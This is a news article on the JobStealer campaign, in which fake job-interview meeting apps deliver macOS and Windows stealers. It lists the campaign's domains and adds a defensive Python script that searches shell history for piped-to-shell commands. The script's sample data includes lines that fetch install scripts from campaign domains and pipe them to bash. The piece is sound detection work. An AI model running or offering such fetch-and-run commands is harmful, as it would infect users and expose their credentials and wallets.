HackRead

Fake Job Interview Apps Drop JobStealer Malware on Windows and macOS


A fake job interview is now being used as bait to steal crypto wallets, browser credentials, and sensitive files from both Windows and macOS users. Researchers at Dr.Web say the malware campaign revolves around a trojan called JobStealer, which disguises itself as a video conferencing app during the hiring process.

This malware campaign begins with scammers approaching victims with job offers and inviting them to attend an online interview through a custom meeting platform. The websites look clean, complete with branding, social media accounts, and Telegram channels designed to make the services appear active and trustworthy.

However, instead of joining an interview, users end up downloading malware. Researchers identified fake conferencing apps using names such as MeetLab, Meetix, Juseo, and Carolla. Some sites even impersonate legitimate services like Cisco Webex to reduce suspicion.

The list of malicious sites used in this campaign includes the following:

  • Meetlab.io
  • Meetix.app
  • Carolla.app
  • Cloudproxy.link

JobStealer Malware Targeting macOS

On macOS systems, attackers use two installation methods. One method asks the user to copy and paste a Bash command into Terminal. The other delivers a DMG file that includes fake installation instructions. In both cases, the victim is tricked into launching the Trojan manually, which helps the malware bypass normal security warnings.

JobStealer is delivered through malicious websites either as a DMG file or through a Bash command executed in Terminal, followed by a fake prompt requesting the user’s macOS password. (Image credit: Dr Web)

That detail matters because the malware depends heavily on user interaction. The malicious script downloads a file detected as Mac.PWS.JobStealer.1, which is built to run on both Intel and Apple Silicon Macs. According to Dr.Web’s blog post, newer versions added stronger obfuscation and arm64 support after earlier variants failed to run properly on newer Mac hardware.

Once active, the malware displays a fake error message asking the victim for their macOS account password. From there, it begins collecting a wide range of data from the infected system.

The primary target appears to be cryptocurrency assets, with JobStealer searching Chromium-based browsers, including Chrome, Brave, Opera, Edge, Vivaldi, Arc, and CocCoc, for roughly 300 crypto wallet extensions.

It also extracts browser cookies, saved passwords, autofill payment data, Telegram session files, notes stored in Apple Notes, and traces of hardware wallet software such as Ledger Live and Trezor Suite.

After collecting the information, the malware compresses the files into a ZIP archive and uploads them to a command and control server controlled by the attackers.

JobStealer Targets More Platforms

Dr.Web also identified a Windows version of JobStealer with similar data theft capabilities. While the macOS variant uses Terminal commands and fake DMG installers, the Windows samples follow the same fake interview approach and focus on stealing browser data, crypto wallets, and user credentials.

Worse, researchers also found download sections for Linux, iOS, and Android variants on some malicious sites, although those versions do not appear to be fully deployed yet.

Users should avoid running Terminal commands provided during interviews, especially when shared through unofficial meeting platforms or unfamiliar websites. Downloading conferencing software directly from official vendor sites remains the safer option. Companies conducting legitimate interviews rarely require candidates to bypass operating system protections or manually execute scripts.

Dr.Web mapped the malware activity to several MITRE ATT&CK techniques, including malicious copy and paste execution, credential theft from browsers and keychains, automated data collection, and exfiltration through web services.
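The delivery path described above (a Bash one-liner pasted into Terminal, fetched from one of the campaign's sites) leaves a trace in shell history and endpoint command-line telemetry that a defender can hunt for. The following Python script is an added example, not code from HackRead or Dr.Web: it scans zsh/bash history lines for commands that pipe remote content straight into a shell and for any reference to the four domains listed in the article. The regular expressions are my own heuristics, and the history lines are constructed for the demonstration.

```python
"""Hunt shell history / command-line telemetry for the macOS delivery pattern:
remote content piped into a shell, and references to the campaign's sites."""
import re
from dataclasses import dataclass, field

# Domains named in the article's site list. In a real deployment this would
# come from a threat-intel feed rather than a hard-coded set.
CAMPAIGN_DOMAINS = {"meetlab.io", "meetix.app", "carolla.app", "cloudproxy.link"}

# Heuristic 1: curl/wget output piped into sh/bash/zsh (optionally via sudo).
PIPE_TO_SHELL = re.compile(
    r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.IGNORECASE
)
# Heuristic 2: the same idea via command substitution, e.g. bash -c "$(curl ...)".
SUBST_TO_SHELL = re.compile(
    r"\b(ba|z)?sh\s+-c\s+[\"']?\$\((curl|wget)\b", re.IGNORECASE
)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")


@dataclass
class Finding:
    line_no: int
    reasons: list = field(default_factory=list)
    text: str = ""


def domain_hits(cmd):
    """Return campaign domains referenced by any URL in the command,
    including subdomains (cdn.meetix.app matches meetix.app)."""
    hits = set()
    for host in URL_HOST.findall(cmd):
        host = host.lower()
        for dom in CAMPAIGN_DOMAINS:
            if host == dom or host.endswith("." + dom):
                hits.add(dom)
    return hits


def analyze_command(cmd):
    """Return a list of reasons a single command line is suspicious (empty if none)."""
    reasons = []
    if PIPE_TO_SHELL.search(cmd) or SUBST_TO_SHELL.search(cmd):
        reasons.append("remote-content-piped-to-shell")
    for dom in sorted(domain_hits(cmd)):
        reasons.append(f"campaign-domain:{dom}")
    return reasons


def scan_history(lines):
    """Scan history lines; zsh extended format (': <ts>:<dur>;cmd') is unwrapped."""
    findings = []
    for line_no, raw in enumerate(lines, 1):
        cmd = raw.strip()
        if cmd.startswith(":") and ";" in cmd:
            cmd = cmd.split(";", 1)[1]
        reasons = analyze_command(cmd)
        if reasons:
            findings.append(Finding(line_no, reasons, cmd))
    return findings


# Constructed sample: a zsh history with benign entries and three suspicious ones.
SAMPLE_HISTORY = [
    ": 1700000000:0;ls -la ~/Downloads",
    ": 1700000010:0;curl -fsSL https://meetlab.io/install.sh | bash",
    ": 1700000020:0;brew install --cask zoom",
    ": 1700000030:0;bash -c \"$(curl -fsSL https://cdn.meetix.app/setup)\"",
    ": 1700000040:0;open https://www.webex.com/downloads.html",
    ": 1700000050:0;wget -qO- https://example.org/script.sh | sh",
]


def main():
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.line_no}: {', '.join(f.reasons)}\n    {f.text}")


if __name__ == "__main__":
    main()
```

The pipe-to-shell heuristic fires on legitimate installers too (many projects document `curl ... | bash`), so in practice it is a triage signal to pair with the domain match and with the user's account: a hit in the history of someone who just "attended an interview" on an unfamiliar platform is the case the article describes.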

The campaign also shows how threat actors are adapting social engineering tactics to fit the remote work culture instead of depending solely on phishing emails or malicious attachments.
